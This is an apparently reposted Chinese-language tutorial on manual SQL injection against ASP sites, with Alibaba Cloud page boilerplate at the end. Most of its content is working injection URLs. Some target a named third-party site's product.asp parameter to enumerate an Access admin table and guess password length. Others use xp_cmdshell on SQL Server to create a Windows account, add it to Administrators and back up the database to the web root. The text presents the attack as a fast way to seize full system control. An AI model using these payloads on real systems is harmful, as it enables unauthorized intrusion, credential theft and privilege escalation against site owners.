手工注射asp學習

來源:互聯網
上載者:User

ACCESS

查詢資料庫類型
http://www.zengke.com/product.asp?sort_id=24 and exists (select * from sysobjects)

查詢表admin頁面返回正常顯示為有,錯誤為無。
http://www.zengke.com//product.asp?sort_id=24 and exists (select * from admin)

查詢admin表中的項admin
/product.asp?sort_id=24 and exists (select admin_name from admin)

查詢admin表中的項admin裡面的內容長度 小於出錯 等於返回正常
http://www.zengke.com//product.asp?sort_id=24 And (Select Top 1 len(cstr([pwd])) From (Select Top 1 * From [admin] Where 1=1 Order by [pwd]) T Order by [pwd] desc)<=7

暴力猜解admin表中的項admin_name

SQL

①http://Site/url.asp?id=1;exec master..xp_cmdshell “net user name password /add”--

  分號;在SQLServer中表示隔開前後兩句語句,--表示後面的語句為注釋,所以,這句語句在SQLServer中將被分成兩句執行,先是Select出ID=1的記錄,然後執行預存程序xp_cmdshell,這個預存程序用於調用系統命令,於是,用net命令建立了使用者名稱為name、密碼為password的windows的帳號,接著:

②http://Site/url.asp?id=1;exec master..xp_cmdshell “net localgroup administrators name /add”--

  將建立的帳號name加入Administrator 群組,不用兩分鐘,你已經拿到了系統最高許可權!當然,這種方法只適用於用sa串連資料庫的情況,否則,是沒有許可權調用xp_cmdshell的。

  ③http://Site/url.asp?id=1 ;;and db_name()>0

前面有個類似的例子and user>0,作用是擷取串連使用者名稱,db_name()是另一個系統變數,返回的是串連的資料庫名。

④http://Site/url.asp?id=1;backup database 資料庫名 to disk='c:inetpubwwwroot

相關文章

聯繫我們

該頁面正文內容均來源於網絡整理,並不代表阿里雲官方的觀點,該頁面所提到的產品和服務也與阿里云無關,如果該頁面內容對您造成了困擾,歡迎寫郵件給我們,收到郵件我們將在5個工作日內處理。

如果您發現本社區中有涉嫌抄襲的內容,歡迎發送郵件至: info-contact@alibabacloud.com 進行舉報並提供相關證據,工作人員會在 5 個工作天內聯絡您,一經查實,本站將立刻刪除涉嫌侵權內容。

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.